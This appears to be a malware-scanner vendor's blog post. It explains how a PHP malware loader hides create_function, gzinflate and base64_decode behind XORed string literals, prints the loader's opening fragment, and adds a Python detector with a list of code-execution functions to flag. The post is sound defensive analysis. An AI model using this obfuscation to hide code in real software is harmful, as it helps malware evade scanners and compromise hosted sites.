Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for even better malware recognition.
In this blog post we want to show you a crypted, or let's say creative, type of malware.
<?php [...]
$DremCyDVIcUefCvAGjHsXazHSRhDh='O++8>61K7E4X.-T'^',YNYJSn-B+W,GB:';
$wkFbXIabdiDyMjAIjHrrAPR='3>RU5G966'^'TD;;S+XBS';
$XjREnyTkjZLGhlhLUlJh=':.27EG2P0PD4='^'XOARssm4U3+PX';
$RTJYyVDhRUEnHmoSGksRZlPh = $DremCyDVIcUefCvAGjHsXazHSRhDh('',$wkFbXIabdiDyMjAIjHrrAPR($XjREnyTkjZLGhlhLUlJh(
This looks quite suspicious at first sight, of course. But what does this code do? In fact it is the same as:
<?php [...]
$var1 = 'create_function';
$var2 = 'gzinflate';
$var3 = 'base64_decode';
$var4 = $var1('', $var2($var3([....]
But how does that work? This malware makes use of a "feature" of PHP: the bitwise operators also accept strings, and then XOR them byte by byte (who the hell would need this in normal code?).
See this example:
echo 51^81;
The result is 98, the ordinary integer XOR of 51 and 81.
Now the bad part:
echo '34'^'QU';
The result is: ba
Each byte of the first string is XORed with the byte at the same position in the second string, and the result is again a string.
In fact it is the same as:
echo chr(ord('3') ^ ord('Q')) . chr(ord('4') ^ ord('U'));
Sadly, this makes it quite easy to hide malicious code from "normal" scanners that simply look for strings like "base64_decode", but the ISPProtect heuristic mode is able to find code that is hidden in that way.
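To make the detection side concrete, here is a small Python script that does what a signature-only scanner misses: it finds every 'x'^'y' pair of string literals in a piece of PHP source, resolves the XOR the same way PHP does, and reports any resolved names that are known code-loading or decoding functions. This is an added example and not ISPProtect's own code; the regular expression for PHP single-quoted literals, the SUSPICIOUS_FUNCTIONS list and the SAMPLE input (the loader fragment quoted above) are assumptions made for this illustration.

```python
import re
from typing import List, Tuple

# A PHP single-quoted string literal; only \' and \\ are escape sequences there.
_PHP_SQ = r"'((?:[^'\\]|\\.)*)'"
# Two such literals joined by the bitwise XOR operator, e.g. 'ab' ^ 'cd'.
_XOR_PAIR = re.compile(_PHP_SQ + r"\s*\^\s*" + _PHP_SQ)

# Assumed list: function names that are a strong signal when they only
# appear after decoding rather than as plain text in the file.
SUSPICIOUS_FUNCTIONS = {
    "create_function", "eval", "assert", "base64_decode", "gzinflate",
    "gzuncompress", "str_rot13", "system", "shell_exec", "passthru", "exec",
}


def php_unescape_single(s: str) -> str:
    """Undo the two escapes PHP allows inside single-quoted strings."""
    return s.replace("\\'", "'").replace("\\\\", "\\")


def xor_strings(a: str, b: str) -> str:
    """Replicate PHP's 'str' ^ 'str': XOR byte by byte, truncated to the shorter operand."""
    ab = a.encode("latin-1", "replace")
    bb = b.encode("latin-1", "replace")
    return bytes(x ^ y for x, y in zip(ab, bb)).decode("latin-1")


def resolve_xor_literals(source: str) -> List[Tuple[str, str, str]]:
    """Return (left, right, decoded) for every 'x' ^ 'y' pair found in PHP source."""
    found = []
    for m in _XOR_PAIR.finditer(source):
        left = php_unescape_single(m.group(1))
        right = php_unescape_single(m.group(2))
        found.append((left, right, xor_strings(left, right)))
    return found


def find_hidden_functions(source: str) -> List[str]:
    """Names from SUSPICIOUS_FUNCTIONS that only become visible after resolving the XOR."""
    return sorted({dec for _, _, dec in resolve_xor_literals(source)
                   if dec in SUSPICIOUS_FUNCTIONS})


# Constructed sample: the obfuscated loader fragment quoted in the post above.
SAMPLE = r"""<?php
$DremCyDVIcUefCvAGjHsXazHSRhDh='O++8>61K7E4X.-T'^',YNYJSn-B+W,GB:';
$wkFbXIabdiDyMjAIjHrrAPR='3>RU5G966'^'TD;;S+XBS';
$XjREnyTkjZLGhlhLUlJh=':.27EG2P0PD4='^'XOARssm4U3+PX';
$RTJYyVDhRUEnHmoSGksRZlPh = $DremCyDVIcUefCvAGjHsXazHSRhDh('',$wkFbXIabdiDyMjAIjHrrAPR($XjREnyTkjZLGhlhLUlJh(
"""

if __name__ == "__main__":
    for left, right, decoded in resolve_xor_literals(SAMPLE):
        print(f"{left!r} ^ {right!r} -> {decoded!r}")
    print("hidden calls:", find_hidden_functions(SAMPLE))
```

Run against the sample, the three XOR pairs resolve to create_function, gzinflate and base64_decode, none of which occur literally in the file. The same approach extends to other string-level obfuscations (chr() chains, str_rot13, concatenation of one-character literals): resolve the constant expression first, then match signatures against the resolved value instead of the raw source.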
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.